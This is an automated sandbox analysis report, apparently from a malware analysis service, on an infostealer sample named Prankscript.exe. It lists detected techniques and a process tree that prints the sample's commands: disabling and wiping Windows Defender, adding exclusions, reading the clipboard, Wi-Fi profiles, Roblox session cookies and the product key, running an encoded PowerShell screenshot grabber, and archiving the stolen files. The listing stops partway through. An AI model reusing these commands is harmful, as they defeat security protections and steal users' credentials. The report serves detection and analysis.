Analysis

  • max time kernel
    59s
  • max time network
    52s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    24-10-2024 17:21

General

  • Target

    Prankscript.exe

  • Size

    69.0MB

  • MD5

    8be83b5e08807bd5dce6a7585404da1a

  • SHA1

    0d7eb7fd9db3c5f95c59d013baeeb47823d233fb

  • SHA256

    d576e30d35b148d752401bcba75fb935e38c2a9ae9ff07cd1c9c6fdb209c4ca3

  • SHA512

    69ddec2cae5a0b37dbd327d63c08213e0f01aea91d43bf8d5ae2bd0d73617ca77c7a0831b590d2cb6b26b2bc986a328d6869cbc8828b0debe9f42b35662646c5

  • SSDEEP

    196608:lBUU+sxfo2y8urErvI9pWjgU1DEzx7sKL/s1tPAkjUWlRHKq:dXxfo38urEUWjhEhn01tl9Kq

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 20 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
    "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1584
    • C:\Users\Admin\AppData\Local\Temp\Prankscript.exe
      "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1396
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Prankscript.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4264
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2056
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2964
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          4⤵
          • Deletes Windows Defender Definitions
          PID:1908
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1736
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2952
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1200
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1924
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6FF0.tmp\6FF1.tmp\6FF2.vbs //Nologo
            5⤵
            • Checks computer location settings
            PID:2576
            • C:\Windows\System32\notepad.exe
              "C:\Windows\System32\notepad.exe"
              6⤵
                PID:4476
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe""
          3⤵
          • Hide Artifacts: Hidden Files and Directories
          • Suspicious use of WriteProcessMemory
          PID:3796
          • C:\Windows\system32\attrib.exe
            attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Prankscript.exe"
            4⤵
            • Views/modifies file attributes
            PID:956
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4724
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:424
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4040
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:1964
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2832
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2836
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2944
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4672
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:2772
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:404
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:4604
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3820
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:2412
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4700
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4268
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dk2w5o4m\dk2w5o4m.cmdline"
                5⤵
                  PID:4220
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7782.tmp" "c:\Users\Admin\AppData\Local\Temp\dk2w5o4m\CSC6E0DC9FF55F4B0A9C3EB9C5E5020CC.TMP"
                    6⤵
                      PID:1464
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4852
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4104
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4844
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:2840
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:4488
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:4712
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:404
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1608
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:4736
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:1484
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:3500
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:880
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:3308
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5072
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "getmac"
                                    3⤵
                                      PID:3676
                                      • C:\Windows\system32\getmac.exe
                                        getmac
                                        4⤵
                                          PID:4612
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI15842\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\f8QkL.zip" *"
                                        3⤵
                                          PID:2080
                                          • C:\Users\Admin\AppData\Local\Temp\_MEI15842\rar.exe
                                            C:\Users\Admin\AppData\Local\Temp\_MEI15842\rar.exe a -r -hp"grabby" "C:\Users\Admin\AppData\Local\Temp\f8QkL.zip" *
                                            4⤵
                                            • Executes dropped EXE
                                            PID:2912
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                          3⤵
                                            PID:1124
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic os get Caption
                                              4⤵
                                                PID:3568
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                              3⤵
                                                PID:2028
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic computersystem get totalphysicalmemory
                                                  4⤵
                                                    PID:4440
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                  3⤵
                                                    PID:3156
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic csproduct get uuid
                                                      4⤵
                                                        PID:4708
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                      3⤵
                                                        PID:372
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          4⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1000
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                        3⤵
                                                          PID:4688
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic path win32_VideoController get name
                                                            4⤵
                                                            • Detects videocard installed
                                                            PID:3700
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                          3⤵
                                                            PID:4136
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              4⤵
                                                                PID:880
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3396
                                                            • C:\Windows\system32\cmd.exe
